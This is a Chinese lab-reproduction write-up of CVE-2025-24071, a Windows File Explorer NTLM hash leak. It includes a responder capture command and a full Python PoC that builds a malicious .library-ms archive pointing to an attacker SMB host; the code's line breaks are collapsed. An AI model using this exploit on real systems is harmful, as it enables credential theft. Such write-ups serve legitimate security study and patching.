0x00 前言
Windows文件资源管理器(File Explorer)是Windows操作系统的核心组件,主要用于浏览、管理和操作本地及网络文件、文件夹、驱动器等资源。它提供直观的图形化界面,支持文件创建、复制、移动、删除、重命名等基础操作,同时集成网络共享访问、外部设备管理、文件搜索与筛选等高级功能,是多任务文件处理的核心工具。
0x01 漏洞描述
Windows资源管理器在解压包含特制 .library-ms文件的 RAR/ZIP 存档时,会自动解析该文件内嵌的恶意SMB路径(如 \192.168.1.116shared),触发隐式NTLM认证握手,导致用户NTLMv2哈希泄露。
0x02 漏洞复现
(1)准备工具
Windows系统(被攻击)IP:192.168.2.11Kali Linux(攻击)IP:192.168.2.12CVE-2025-24071的POC文件a.pyKali Linux中间人工具responder
(2)复现过程
1、设置windows的IP地址:192.168.2.11
2、设置kali的IP地址:192.168.2.12
3、在kali中打开responder中间人工具,终端执行命令:
sudo responder -I eth0 -v
4、生成恶意压缩包,终端执行命令python a.py
a.py内容如下:
import osimport zipfiledef main():file_name = input("Enter your file name: ")ip_address = input("Enter IP (EX: 192.168.1.162): ")library_content = f"""<libraryDescriptionxmlns="http://schemas.microsoft.com/windows/2009/library"><searchConnectorDescriptionList><searchConnectorDescription><simpleLocation><url>\\{ip_address}\shared</url></simpleLocation></searchConnectorDescription></searchConnectorDescriptionList></libraryDescription>"""library_file_name = f"{file_name}.library-ms"with open(library_file_name, "w", encoding="utf-8") as f:f.write(library_content)with zipfile.ZipFile("exploit.zip", mode="w", compression=zipfile.ZIP_DEFLATED) as zipf:zipf.write(library_file_name)if os.path.exists(library_file_name):os.remove(library_file_name)print("completed")if __name__ == "__main__":main()
5、把生成的exploit.zip压缩包放到windows系统中解压。
6、kali系统中成功获取到windows的hash
0x03 漏洞补丁
编号:KB5053606
0x04 参考链接
https://msrc.microsoft.com/update-guide/vulnerability/CVE-2025-24071
原文始发于微信公众号(信安百科):【漏洞复现】CVE-2025-24071|Windows 文件资源管理器欺骗漏洞
免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论